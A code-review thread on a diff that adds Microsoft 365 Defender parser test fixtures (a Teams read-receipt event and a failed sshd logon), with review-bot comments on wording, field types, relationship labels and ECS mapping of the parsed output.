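Review bot: The new cloud-app description reads `A new {action.type} cloud app event have been received`; the subject is singular, so it should be `has been received`. The entry is also inserted at the very top of the list with only `event.dataset` and `action.type` as conditions, so if descriptions are evaluated in order this generic entry would shadow any more specific `cloud_app_events` entry further down — worth confirming the selection rule before keeping it first. Within the same entry the last condition is written inline (`{ "field": "action.type" }`) while the first is expanded over four lines; the file's other entries use one form per block, so pick one here too.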
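Review bot: The `LogonFailed` entry in the second hunk carries a relationship of type `logged on` from `user.name` to `host.name`, which asserts a successful logon for an event whose own description says the logon failed; a graph built from these edges could no longer distinguish a failed attempt from an established session, which is exactly the distinction an analyst triaging brute-force activity needs. Either drop the `relationships` block for this entry or give the edge a type that matches the outcome, e.g. `"type": "failed to log on"`.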
@@ -0,0 +1,63 @@ +{ + "input": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":
[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\":\"2024-10-28T14:24:31.9854915Z\",\"tenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-CloudAppEvents\",\"_TimeReceivedBySvc\":\"2024-10-28T14:20:30.0960000Z\",\"properties\":{\"ActionType\":\"MessageReadReceiptReceived\",\"ApplicationId\":28375,\"AccountDisplayName\":\"John DOE\",\"AccountObjectId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"AccountId\":\"abcd1234-1234-1234-1234-abcdef123456\",\"DeviceType\":null,\"OSPlatform\":null,\"IPAddress\":null,\"IsAnonymousProxy\":null,\"CountryCode\":null,\"City\":null,\"ISP\":null,\"UserAgent\":null,\"IsAdminOperation\":false,\"ActivityObjects\":[{\"Type\":\"Structured object\",\"Role\":\"Parameter\",\"ServiceObjectType\":\"Microsoft Team\"},{\"Type\":\"User\",\"Role\":\"Actor\",\"Name\":\"John 
DOE\",\"Id\":\"abcd1234-1234-1234-1234-abcdef123456\",\"ApplicationId\":11161,\"ApplicationInstance\":0}],\"AdditionalFields\":{},\"ActivityType\":\"Basic\",\"ObjectName\":null,\"ObjectType\":null,\"ObjectId\":null,\"AppInstanceId\":0,\"AccountType\":\"Regular\",\"IsExternalUser\":false,\"IsImpersonated\":false,\"IPTags\":null,\"IPCategory\":null,\"UserAgentTags\":null,\"RawEventData\":{\"ChatThreadId\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"CommunicationType\":\"GroupChat\",\"CreationTime\":\"2024-10-28T14:18:38Z\",\"ExtraProperties\":[],\"Id\":\"abcd1234-ef09-1234-abcd-123456abcdef\",\"ItemName\":\"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\",\"MessageId\":\"1730125116564\",\"MessageVersion\":\"0\",\"MessageVisibilityTime\":\"2022-09-21T08:33:35Z\",\"Operation\":\"MessageReadReceiptReceived\",\"OrganizationId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"ParticipantInfo\":{\"HasForeignTenantUsers\":false,\"HasGuestUsers\":false,\"HasOtherGuestUsers\":false,\"HasUnauthenticatedUsers\":false,\"ParticipatingDomains\":[],\"ParticipatingSIPDomains\":[],\"ParticipatingTenantIds\":[\"12345678-abcd-ef09-1234-123456abcdef\"]},\"RecordType\":25,\"ResourceTenantId\":\"12345678-abcd-ef09-1234-123456abcdef\",\"UserId\":\"john.doe@company.fr\",\"UserKey\":\"abcd1234-1234-1234-1234-abcdef123456\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"},\"ReportId\":\"98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef\",\"Timestamp\":\"2024-10-28T14:18:38Z\",\"Application\":\"Microsoft Teams\"},\"Tenant\":\"DefaultTenant\"}", + "event": { + "category": [ + "network" + ], + "dataset": "cloud_app_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-28T14:18:38Z", + "action": { + "properties": { + "Application": "Microsoft Teams", + "ApplicationId": "28375", + "IsAdminOperation": "false", + "IsExternalUser": false, + "IsImpersonated": false, + "RawEventData": 
"{\"ChatThreadId\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"CommunicationType\": \"GroupChat\", \"CreationTime\": \"2024-10-28T14:18:38Z\", \"ExtraProperties\": [], \"Id\": \"abcd1234-ef09-1234-abcd-123456abcdef\", \"ItemName\": \"19:abcd1234-1234-1234-1234-abcdef123456_12345678-abcd-abcd-abcd-123456abcdef@eu.test.com\", \"MessageId\": \"1730125116564\", \"MessageVersion\": \"0\", \"MessageVisibilityTime\": \"2022-09-21T08:33:35Z\", \"Operation\": \"MessageReadReceiptReceived\", \"OrganizationId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"ParticipantInfo\": {\"HasForeignTenantUsers\": false, \"HasGuestUsers\": false, \"HasOtherGuestUsers\": false, \"HasUnauthenticatedUsers\": false, \"ParticipatingDomains\": [], \"ParticipatingSIPDomains\": [], \"ParticipatingTenantIds\": [\"12345678-abcd-ef09-1234-123456abcdef\"]}, \"RecordType\": 25, \"ResourceTenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"UserId\": \"john.doe@company.fr\", \"UserKey\": \"abcd1234-1234-1234-1234-abcdef123456\", \"UserType\": 0, \"Version\": 1, \"Workload\": \"MicrosoftTeams\"}" + }, + "type": "MessageReadReceiptReceived" + }, + "microsoft": { + "defender": { + "activity": { + "objects": [ + { + "Role": "Parameter", + "ServiceObjectType": "Microsoft Team", + "Type": "Structured object" + }, + { + "ApplicationId": 11161, + "ApplicationInstance": 0, + "Id": "abcd1234-1234-1234-1234-abcdef123456", + "Name": "John DOE", + "Role": "Actor", + "Type": "User" + } + ], + "type": "Basic" + }, + "report": { + "id": "98261974_28375_abcd1234-ef09-1234-abcd-123456abcdef" + } + } + }, + "user": { + "full_name": "John DOE" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json new file mode 100644 index 000000000..1d69ebb63 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_device_logon_failed.json 
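Review bot: The expected `action.properties` object pins `IsAdminOperation` as the string `"false"` while its siblings `IsExternalUser` and `IsImpersonated` are JSON booleans, and `ApplicationId` as the string `"28375"` while the same key inside `microsoft.defender.activity.objects` is the number `11161`. This presumably mirrors what the parser emits today, but committing it as the expectation freezes a type mismatch that any consumer filtering on these keys has to special-case; aligning the parser output (boolean and integer) before pinning it here avoids that. `RawEventData` is likewise stored as a JSON document inside a string, so a consumer must parse it a second time to reach fields such as `UserId`.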
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": \"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 
-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", \"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, 
\"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 Defender", + "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f" + } + } + }, + "expected": { + "message": "{\"time\": \"2024-11-18T10:08:29.9147832Z\", \"tenantId\": \"12345678-abcd-ef09-1234-123456abcdef\", \"operationName\": \"Publish\", \"category\": \"AdvancedHunting-DeviceLogonEvents\", \"_TimeReceivedBySvc\": \"2024-11-18T10:07:35.3397350Z\", \"properties\": {\"AccountName\": \"account\", \"AccountDomain\": \"domain\", \"LogonType\": \"Network\", \"DeviceName\": \"domain\", \"DeviceId\": \"1111111111111111111111111111111111111111\", \"ReportId\": 413706, \"AccountSid\": null, \"AppGuardContainerId\": null, \"LogonId\": null, \"RemoteIP\": \"1.2.3.4\", \"RemotePort\": null, \"RemoteDeviceName\": null, \"ActionType\": \"LogonFailed\", \"InitiatingProcessId\": 3653343, \"InitiatingProcessCreationTime\": \"2024-11-18T10:07:20.29393Z\", \"InitiatingProcessFileName\": \"sshd\", \"InitiatingProcessFolderPath\": \"/usr/sbin/sshd\", \"InitiatingProcessSHA1\": \"f1d50e0d3e0ba197baf152614e0cd94487a1142e\", \"InitiatingProcessSHA256\": \"eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232\", \"InitiatingProcessMD5\": \"51a9cac9c4e8da44ffd7502be17604ee\", \"InitiatingProcessCommandLine\": 
\"/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc -oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R\", \"InitiatingProcessAccountName\": \"root\", \"InitiatingProcessAccountDomain\": \"domain\", \"InitiatingProcessAccountSid\": null, \"InitiatingProcessTokenElevation\": \"None\", \"InitiatingProcessIntegrityLevel\": null, \"InitiatingProcessParentId\": 3653343, \"InitiatingProcessParentCreationTime\": \"2024-11-18T10:07:20.29Z\", 
\"InitiatingProcessParentFileName\": \"sshd\", \"AdditionalFields\": \"{\\\"PosixUserId\\\":1301,\\\"PosixPrimaryGroupName\\\":\\\"account\\\",\\\"PosixPrimaryGroupId\\\":500,\\\"PosixSecondaryGroups\\\":\\\"[{\\\\\\\"Name\\\\\\\":\\\\\\\"users\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":100},{\\\\\\\"Name\\\\\\\":\\\\\\\"exploitation\\\\\\\",\\\\\\\"PosixGroupId\\\\\\\":1202}]\\\",\\\"InitiatingAccountName\\\":\\\"root\\\",\\\"InitiatingAccountDomain\\\":\\\"domain\\\",\\\"InitiatingAccountPosixUserId\\\":0,\\\"InitiatingAccountPosixGroupName\\\":\\\"mdatp\\\",\\\"InitiatingAccountPosixGroupId\\\":595}\", \"RemoteIPType\": \"Private\", \"IsLocalAdmin\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"Protocol\": null, \"FailureReason\": null, \"InitiatingProcessFileSize\": 890528, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-11-18T10:07:22.681617Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "authentication" + ], + "dataset": "device_logon_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-18T10:07:22.681617Z", + "action": { + "properties": { + "InitiatingProcessCommandLine": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "InitiatingProcessFileSize": 890528, + "LogonType": "Network", + "RemoteIPType": "Private" + }, + "type": "LogonFailed" + }, + "destination": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "host": { + "id": "1111111111111111111111111111111111111111", + "name": "domain" + }, + "microsoft": { + "defender": { + "report": { + "id": "413706" + } + } + }, + "process": { + "args": [ + "-D", + "-R", + 
"-oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa", + "-oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc", + "-oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1-", + "-oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com", + "-oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1", + "-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512", + "-oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com" + ], + "command_line": "/usr/sbin/sshd -D -oCiphers=aes256-gcm@openssh.com,user@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc 
-oMACs=hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,umac-128@openssh.com,hmac-sha2-512 -oGSSAPIKexAlgorithms=gss-curve25519-sha256-,gss-nistp256-sha256-,gss-group14-sha256-,gss-group16-sha512-,gss-gex-sha1-,gss-group14-sha1- -oKexAlgorithms=curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1 -oHostKeyAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oPubkeyAcceptedKeyTypes=ecdsa-sha2-nistp256,ecdsa-sha2-nistp256-cert-v01@openssh.com,ecdsa-sha2-nistp384,ecdsa-sha2-nistp384-cert-v01@openssh.com,ecdsa-sha2-nistp521,ecdsa-sha2-nistp521-cert-v01@openssh.com,ssh-ed25519,ssh-ed25519-cert-v01@openssh.com,rsa-sha2-256,rsa-sha2-256-cert-v01@openssh.com,rsa-sha2-512,rsa-sha2-512-cert-v01@openssh.com,ssh-rsa,ssh-rsa-cert-v01@openssh.com -oCASignatureAlgorithms=ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521,ssh-ed25519,rsa-sha2-256,rsa-sha2-512,ssh-rsa -R", + "executable": "/usr/sbin/sshd", + "hash": { + "md5": "51a9cac9c4e8da44ffd7502be17604ee", + "sha1": "f1d50e0d3e0ba197baf152614e0cd94487a1142e", + "sha256": "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232" + }, + "name": "sshd", + "parent": { + "name": "sshd", + "pid": 3653343, + "start": "2024-11-18T10:07:20.290000Z" + }, + "pid": 3653343, + "start": "2024-11-18T10:07:20.293930Z", + "user": { + "domain": "domain", + "name": "root" + }, + 
"working_directory": "/usr/sbin" + }, + "related": { + "hash": [ + "51a9cac9c4e8da44ffd7502be17604ee", + "eb3fd3d0548771153565acd49edf4667a576959b8e265be7c0061017c6479232", + "f1d50e0d3e0ba197baf152614e0cd94487a1142e" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "account" + ] + }, + "user": { + "domain": "domain", + "name": "account" + } + } +} \ No newline at end of file diff --git a/Microsoft/microsoft-365-defender/tests/test_email_delivered.json b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json new file mode 100644 index 000000000..11ca88986 --- /dev/null +++ b/Microsoft/microsoft-365-defender/tests/test_email_delivered.json 
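Review bot: The expected output for an `ActionType: LogonFailed` record carries `event.type: ["info"]` and no `event.outcome`, so a rule written the ECS way (`event.category: authentication and event.outcome: failure`) will never match these sshd failures; the fixture should expect `"outcome": "failure"` and `"type": ["start"]`, with the matching mapping added in parser.yml, which is outside this hunk. The same record puts `RemoteIP` under `destination.ip`, yet for a logon attempt arriving at this host's sshd the remote peer is the origin of the attempt; if Defender's `RemoteIP` means the device that performed the logon, as the name suggests, `source.ip` is the right home and brute-force aggregations keyed on source would otherwise miss it. `related.user` lists only `account` and not the initiating `root`, which may be deliberate but is worth stating.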
